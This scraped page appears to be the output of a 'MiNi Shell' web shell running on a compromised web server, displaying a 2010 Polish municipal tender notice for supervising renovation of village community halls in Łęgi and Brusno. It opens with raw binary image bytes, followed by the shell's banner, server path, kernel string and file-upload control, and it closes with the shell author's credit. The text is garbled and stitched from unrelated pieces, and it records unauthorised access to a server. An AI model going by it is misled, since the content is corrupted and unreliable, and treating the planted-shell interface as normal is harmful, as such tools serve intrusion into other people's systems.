JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100107/3791-N-2010.html

<p class="kh_header"><b>Połczyn-Zdrój: Pełnienie czynności Inspektora nadzoru dla zadania inwestycyjnego p.n. Remont i wyposażenie świetlic wiejskich w miejscowościach Łęgi i Brusno</b><br>
<b>Numer ogłoszenia: 3791 - 2010; data zamieszczenia: 07.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Połczynie-Zdroju , Plac Wolności 3-4, 78-320 Połczyn-Zdrój, woj. zachodniopomorskie, tel. 094 3662400, faks 094 3666105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polczyn-zdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie czynności Inspektora nadzoru dla zadania inwestycyjnego p.n. Remont i wyposażenie świetlic wiejskich w miejscowościach Łęgi i Brusno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na  pełnieniu czynności Inspektora nadzoru dla zadania inwestycyjnego p.n. Remont i wyposażenie świetlic wiejskich 
w miejscowościach Łęgi i Brusno

Zamówienie współfinansowane jest ze środków Unii Europejskiej - Program Rozwoju Obszarów Wiejskich na lata 2007-2013, oś 3 Jakość życia na obszarach wiejskich 
i różnicowanie gospodarki wiejskiej, Działanie 313,322,323 Odnowa i rozwój wsi.
Tytuł Projektu - Remont i wyposażenie świetlic wiejskich w miejscowościach Łęgi 
                           i Brusno
Umowa o przyznanie pomocy - Nr 00113-6922-UM1600118/09 z dnia 14.10.2009r.

ŚWIETLICA W ŁĘGACH
Budynek główny
Obiekt będący przedmiotem opracowania składa się z dwóch części: budynku głównego
i dobudówki od zaplecza . Budynek główny pochodzi z okresu międzywojennego poprzedniego stulecia. 
Obecnie jest to obiekt niepodpiwniczony, parterowy ze stromym dachem i nieużytkowym poddaszem. W okresie wcześniejszym część budynku pod świetlicą główną
była podpiwniczona. Piwnica ta po rozbiórce stropu została zagruzowana, w miejscu stropu
wykonano podłogę drewnianą na legarach. Wymiary budynku w rzucie 11,03x19,63 m. Fundamenty i cokół rozpatrywanego budynku wykonane są z cegły i kamienia ociosanego. Ściany zewnętrzne parteru murowane z cegły ceramicznej pełnej o grubości 41,5 cm (łącznie z wyprawą od wnętrza) licowane od strony zewnętrznej. Nadproża okienne ceglane proste, 
z klinowymi spoinami i łukowe - w stanie dobrym. Nadproże nad drzwiami wejściowymi 
z trzech belek stalowych z dwuteowników stalowych. Stopki belek nietynkowane, nieznacznie skorodowane. W cokole jak i powyżej występują ubytki zaprawy w spoinach. Ściany wewnętrzne parteru o grubości 32 i 38 cm wykonano z cegły ceramicznej pełnej otynkowane tynkiem cem-wap. Tynki wewnętrzne na ścianach w stanie zadowalającym. 
Są nierówne, ale niespękane, dobrze przylegają do podłoża. Tynki na sufitach są w złym stanie technicznym. Na tynku widoczne rysy oddające układ desek w podsufitce.
Strop nad parterem drewniany, belkowy ze ślepym pułapem i glinianą polepą : belki
stropowe o przekroju 180x 250 mm w rozstawie osiowym około 100 cm, deski podłogowe
grubości 30 mm na własne pióro i wpust, deski ślepego pułapu z obrzynków, deski podsufitki
grubości 22 mm otynkowane tynkiem wapiennym na matach trzcinowych. 
Układ konstrukcyjny ścian nośnych - podłużny. Strop drewniany w niezadowalającym stanie technicznym: końcówki dwóch belek stropowych znacznie uszkodzone na skutek znacznego zaawansowania procesów gnilnych silnie zawilgoconej tkanki drewna spowodowane uszkodzeniem obróbek blacharskich przy kominie (wymagają wzmocnienia). Deski podłogowe w znacznym stopniu porażone biologicznie przez gryzonie, niektóre są zmurszałe i przegnite, w 100% do wymiany.
Wejście na strych za pomocą klamer stalowych i wyłazu usytuowanych w narożniku korytarza wejściowego.
Więźba dachowa drewniana o konstrukcji płatwiowo-kleszczowej z zastrzałami przy
ścianach kolankowych: krokwie o przekroju 130x160 mm w rozstawie osiowym ok. 100 cm,
płatwie pośrednie mają przekrój 160x180 mm, słupy podpierające płatwie mają przekrój
160x160 mm, miecze mają przekrój 125x125 mm, kleszcze główne mają przekrój 2x100x180
mm, kleszcze boczne przy ściankach kolankowych mają przekrój 2x80x160 mm. 
Rozstaw osiowy płatwi pośrednich wynosi 452 cm, rozstaw osiowy słupów w kierunku podłużnym zmienny: 293, 383, 404 i 406 cm. Zastrzały mają przekrój 130x160 mm. Wysokość ściany kolankowej łącznie z murłatą (o przekroju 130x160 mm) wynosi 98 cm. Łaty o przekroju 70x42 mm w rozstawie co 420 mm. Pokrycie dachu stanowi ceramiczna dachówka poniemiecka z uszczelnieniem połaci dachowej zaprawą wapienną od spodu. Więźba dachowa jest w średnim stanie technicznym. Elementy konstrukcyjnie 
w nieznacznym stopniu porażone biologicznie przez owady. Jednak w kilku miejscach ( przy kominach i w koszu) na skutek uszkodzenia obróbek blacharskich widoczne zaawansowane procesy gnilne silnie zawilgoconej
tkanki drewna. Konieczna wymiana niektórych elementów.
Ściany zewnętrzne poddasza murowane z cegły pełnej grubości 25 cm otynkowane tynkiem wapiennym. Tynki wewnętrzne nierówne, zmurszałe, spękane, odspojone od cegły,
z miejscowymi ubytkami, do uzupełnienia. Komin na poddaszu w górnej części, pod pokryciem dachowym namoknięty, ze złuszczonym tynkiem.
Stolarka okienna typu skrzynkowego w stanie złym, do wymiany. Obróbki blacharskie,
rynny, rury spustowe w części blachy ocynkowanej, a w części z PCV, w 100 % do wymiany.
Instalacja piorunochronna w wielu miejscach uszkodzona: urwane i powyginane wsporniki
mocujące zwody piorunochronu.
Instalacja elektryczna wykonana z przewodów aluminiowych. Instalacja wod.-kan. widoczna,
prowadzona po wierzchu. Instalacja centralnego ogrzewania z rur stalowych z grzejnikami
żeliwnymi.
Stolarka drzwiowa wewnętrzna drewniana zużyta, w złym stanie technicznym, w 100%
do wymiany.
Część dobudowana
Część dobudowa została zrealizowana w latach 70-tych poprzedniego stulecia. Dobudówka
jest podpiwniczona, w piwnicy zlokalizowano kotłownię. Do kotłowni prowadzi korytarz
ze schodami. Fundamenty betonowe, ściany murowane z cegły
ceramicznej pełnej i kratówki. Strop nad kotłownią i nad zapleczem sceny stanowi płyta Kleina na belkach stalowych. Przekrycie stanowi masywny stropodach niewentylowany
z pokryciem bitumicznym. Nad korytarzem przekrycie lekkie z drewna z pokryciem
bitumicznym. Dobudówka w złym stanie technicznym: pokrycie dachowe zniszczone,
nad korytarzem i schodami zapadnięte do wnętrza; komin spękany, rozszczelniony, częściowo zagruzowany; ściany i tynki zamoknięte, przemarznięte, złuszczone. Dobudówka w całości przewidziana do remontu kapitalnego.

Generalnie zadaniem Inspektora nadzoru jest pełnienie tej funkcji zgodnie z ustawą - Prawo budowlane. Inspektor nadzoru ma za zadanie czuwać nad prawidłową realizacją projektu oraz terminem realizacji prac.







ŚWIETLICA W BRUŚNIE
Ściany zewnętrzne murowane z cegły ceramicznej pełnej o grubości 38 cm są w stanie technicznym ogólnym dostatecznym, poza obszarami gdzie na skutek zaciekania wody 
z odwodnienia dachu uległy silnemu zawilgoceniu. Ściany w tych obszarach wymagają osuszenia. Na powierzchni ścian zewnętrznych widoczne są również zarysowania, które spowodowane są nierównomiernym osiadaniem budynku, nie stanowią one jednak zagrożenia z punktu widzenia bezpieczeństwa konstrukcji.
Tynki zewnętrzne są w stanie technicznym dostatecznym poza obszarami, w których uległy silnemu zawilgoceniu lub uszkodzeniu mechanicznemu. W obszarach tych należy ściany oczyścić ze słabo związanych i luźnych części tynku i wykonać podkład pod ocieplenie metodą lekką mokrą.
Ściany wewnętrzne o grubości 12÷38 cm murowane z cegły ceramicznej pełnej są w stanie technicznym dobrym, nie wymagają ingerencji, poza obszarami w których na skutek uszkodzenia pokrycia dachowego i/lub obróbek blacharskich uległy zawilgoceniu.
Stropodach gęsto-żebrowy typu DZ z prefabrykowanymi pustakami i belkami oraz monolityczną płytą, jest w stanie technicznym ogólnym dostatecznym i nie wymaga ingerencji w konstrukcję. Natomiast pokrycie stropodachu jest w stanie technicznym złym i wymaga wymiany wraz z odtworzeniem prawidłowych spadków. Obróbki blacharskie, rynny i rury spustowe są w stanie technicznym złym i je należy wymienić. Okna drewniane zespolone są w stanie technicznym złym i wymagają wymiany wraz z parapetami.

PODSTAWOWE OBOWIĄZKI INSPEKTORA NADZORU W TRAKCIE PROWADZENIA ROBÓT BUDOWLANO-MONTAŻOWYCH POLEGAĆ BĘDĄ NA :
- przekazaniu Wykonawcy robót placu budowy,
- przejęciu od Wykonawcy robót uzgodnionych harmonogramów przedstawiających cykl  
  realizacji inwestycji,
- stałym uczestnictwie w naradach technicznych koordynacyjnych i innych organizowanych 
  przez wszystkie strony procesu inwestycyjnego,
- sprawdzaniu przez Inspektorów nadzoru w poszczególnych branżach kosztorysów 
  powykonawczych, obmiarów robót a także o ile zajdzie taka potrzeba faktur za wykonane  
   roboty wraz z ich opisaniem do zapłaty w terminie 5 dni od daty ich otrzymania,
- wydawaniu zgody na wykonanie ewentualnych robót dodatkowych po uprzedniej 
  konsultacji z Zamawiającym,
- podejmowaniu wszelkich racjonalnych działań umożliwiających prawidłową realizację 
  harmonogramu,
- prowadzeniu pełnobranżowego nadzoru technicznego nad realizacją robót zgodnie z  
  prawem budowlanym (łącznie z przygotowaniem koniecznych dokumentów do uzyskania  
  pozwolenia na użytkowanie) oraz kontroli wykonywanych robót zgodnie z przepisami bhp,
- sprawdzaniu i odbiorze robót budowlanych ulegających zakryciu lub zanikających , 
  uczestniczeniu w próbach i odbiorach technicznych instalacji urządzeń technicznych oraz  
  gotowego obiektu,
- współdziałaniu z Projektantem i Zamawiającym w zakresie zgodności realizacji inwestycji 
  z projektem budowlanym,
- stałej konsultacji i doradztwie fachowym na rzecz Zamawiającego,
- współpracy z nadzorem autorskim (łącznie ze zmianami pozwoleń na budowę),
- sprawdzaniu jakości wbudowanych materiałów, a w szczególności zapobieganiu 
   zastosowania wyrobów wadliwych i nie dopuszczonych do stosowania w budownictwie 
   zgodnie z obowiązującymi przepisami,
- kontrolowanie rozliczeń budowy - Inspektor Nadzoru odpowiada przed Zamawiającym za  
   nieprawidłowość dokonanych rozliczeń za roboty budowlano-montażowe,
- odbiór inwestycji zgodnie z obowiązującymi przepisami.

Częstotliwość pobytu poszczególnych Inspektorów Nadzoru na budowie powinna być taka, aby nie hamowała postępu robót, jednak nie mniej niż 1 raz w tygodniu.

Zwycięzca przetargu powinien w trakcie całego procesu inwestycyjnego podejmować także inne działania , nie wymienione powyżej , które zabezpieczać będą interes Zamawiającego 
i przyczynią się do sprawnego realizowania inwestycji.
                                                                   
WYKONAWCA JEST ODPOWIEDZIALNY ZA :  - jakość świadczonych usług,    - należytą staranność przy realizacji zobowiązań umowy,    - za szkody wyrządzone podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące 
    warunki:
  1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli        
      ustawy  nakładają obowiązek posiadania takich uprawnień;
     Wykonawca jest zobowiązany przedstawić :
   - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
      ewidencji działalności   gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  
      rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie      
      wcześniej niż 6 miesięcy przed upływem terminu składania ofert                     
  1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
       i osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie 
       innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
      zamówienia
      Wykonawca jest zobowiązany przedstawić :
   - oświadczenie , iż posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem
      technicznym oraz osobami zdolnymi do wykonania zamówienia ;
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
     zamówienia                                                                                                               
      Wykonawca jest zobowiązany przedstawić :
    - oświadczenie; iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej 
      wykonanie zamówienia     
 1.4.  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
      Wykonawca jest zobowiązany przedstawić :
  - oświadczenie do postępowania o zamówienie publiczne w trybie art. 22 ust.l 
     ustawy Prawo zamówień publicznych.

2. Warunki szczegółowe wymagane od Wykonawców 
                                                                           - Minimalne wymagania kwalifikacyjne
2.1. Wykonawca musi być zarejestrowany jako zdolny do realizacji określonych prac ,
2.2.  wszystkie osoby uczestniczące w wykonaniu zamówienia winne posiadać przynajmniej 
    3-letnie doświadczenie oraz udowodnione kwalifikacje w zakresie wykonywania prac 
    o charakterze podobnym do przewidzianych w zamówieniu ,
2.3. Wykonawca musi posiadać zatrudnionych na umowę o pracę Inspektorów nadzoru 
    z uprawnieniami w następujących branżach :
    1/ konstrukcyjno-budowlanej, 
    2/ instalacyjnej w zakresie sieci wodociągowych, kanalizacyjnych i elektrycznych, 
   oraz dokumenty potwierdzające ich przynależność do właściwych samorządów   
   zawodowych.
2.4. doświadczenie Wykonawcy :
     - w ciągu ostatnich 3 lat Wykonawca zrealizował min. jeden Kontrakt o zakresie 
       i charakterze porównywalnym i o wartości  prac  porównywalnej z ceną oferty,
2.5. Wykonawca winien posiadać polisę, a w przypadku jej braku inny dokument 
       potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej 
       w zakresie prowadzonej działalności. 

Zamawiający dokona oceny spełniania w/w warunków, stosując formułę spełnia/nie spełnia na podstawie dokumentów załączonych przez Wykonawców do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty wymagane:
 - formularz ofertowy,  - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
   działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
   zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 
   6 miesięcy przed upływem terminu składania ofert, - dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z 
   przepisów prawa lub innych dokumentów rejestrowych,
- oświadczenie Wykonawcy o nie zaleganiu z opłacaniem podatków, opłat oraz składek na 
   ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane 
   prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
   w całości wykonania decyzji właściwego organu,
- oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 
   ust. 1 pkt 1-3 z wykorzystaniem wzoru i nie wykluczeniu z postępowania na mocy    
   art.24 ust. 1 i 2  ustawy Prawo zamówień publicznych

Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert; 2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.





Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

Dokumenty wymagane w przypadku składania oferty wspólnej.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
Ponadto oferta powinna zawierać :
- umowę regulującą współpracę podmiotów występujących wspólnie, - dokumenty formalne dla każdego partnera z osobna, pozostałe dokumenty składane są 
  wspólnie.  
Inne dokumenty:
W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, 
potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, Wykonawca składa następujące dokumenty :
- wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą 
  uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich 
  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania 
  zamówienia, a także zakresu wykonywanych przez nich czynności 
- pisemnego zobowiązania innych podmiotów do udostępniania osób zdolnych do  
   wykonania zamówienia, jeżeli w wykazie, o którym mowa wyżej, Wykonawca 
   wskazał osoby, którymi będzie dysponował,
 - wykaz wykonanych w okresie ostatnich trzech lat usług, a jeżeli okres 
    prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim  
    rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z 
    podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów 
    potwierdzających, że usługi te zostały wykonane należycie
 
W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w  
       sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy 
       złożyć następujące dokumenty: 
    - polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca   
  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  
  działalności.  

Dokumenty dodatkowe          - parafowany projekt umowy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.polczyn-zdroj.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Połczynie-Zdroju
Plac Wolności 3-4
78-320 Połczyn-Zdrój
pok. nr 206 ( II piętro ).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2010 godzina 11:00, miejsce: Urząd Miejski w Połczynie-Zdroju
Plac Wolności 3-4
78-320 Połczyn-Zdrój
Sekretariat lub pok. nr 206 ( II piętro ).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com